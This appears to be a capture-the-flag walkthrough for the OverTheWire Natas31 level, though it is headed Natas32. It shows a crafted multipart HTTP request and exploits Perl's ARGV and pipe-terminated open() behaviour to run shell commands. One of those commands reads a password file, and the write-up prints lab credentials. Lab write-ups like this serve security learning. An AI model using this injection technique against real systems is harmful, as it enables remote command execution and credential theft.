Natas32

Website URL: http://overthewire.org/wargames/natas/natas32.html

According to the data on the OverTheWire webpage.

Username: natas32
URL:      http://natas32.natas.labs.overthewire.org

Let’s log into the URL for Natas31

Looking at the source:

So, it seems the scripts reads the provided CSV file and splits the content to display in a tabular format. While displaying the content, it also escapes HTML.

Based on this observation, we know that we have to exploit this file inclusion and rendering capability of the script by making it render the contents of our password file.

Let’s have a closer look at the request that the script is sending, and at the script code itself.

POST /index.pl HTTP/1.1
Host: natas31.natas.labs.overthewire.org
Referer: http://natas31.natas.labs.overthewire.org/index.pl?/bin/uname%20|
Content-Type: multipart/form-data; boundary=---------------------------132385328517239476721658232560
Content-Length: 356
Authorization: Basic bmF0YXMzMTpoYXk3YWVjdXVuZ2l1S2FlenVhdGh1azliaWluMHB1MQ==
Connection: close

-----------------------------132385328517239476721658232560
Content-Disposition: form-data; name="file"; filename="test.csv"
Content-Type: text/csv

test,test2
-----------------------------132385328517239476721658232560
Content-Disposition: form-data; name="submit"

Upload
-----------------------------132385328517239476721658232560--

So, notice the Content-Type parameter of the header. It is set to multipart/form-data with a boundary string selected as: “—————————–132385328517239476721658232560”

Referring back to the source code, we find that the file object has been created with no input sanitation! That opens the script up to an RCE vulnerability as pointed out by Netanel Rubin in his talk “Perl Jam 2” in Black Hat 2016.

Basically, the script above could be exploited based on the following facts:

• If instead of a single file, we manage to send a list of file descriptors, or a list containing a mix of data types, the script will still accept it since it checks if only one of them is a file descriptor.
• The ‘<$file>’ statement can parse through arguments if $file is set to the string ‘ARGV’.
• The open function will execute a filename as a command instead of opening it if it is terminated with a ‘|’ character.

The combination of the above three gives us a very potent RCE as we shall see below. Let’s modify the above Request as follows:

Duplicate the form-data block, and insert text “ARGV” as it’s content and name as “file”. Also, add a parameter to the POST destination to fill in the arguments to the script. Remember that if the exploit works, then the string you provide as the argument will be executed. So, the string has to be a valid command, otherwise we won’t see a proper output. Let’s use “/bin/ls%20.%20|” as the string. It will run a basic ls command on the current directory. Note that the string has to be terminated by a ‘|’ otherwise the open() function will not execute the command. Let’s send this request and see the response.

Ooh la la! It worked! We have RCE! Let’s get the password to the next level by modifying the command to “/bin/cat%20/etc/natas_webpass/natas32%20|”

Done!

Password for next level: no1vohsheCaiv3ieH4em1ahchisainge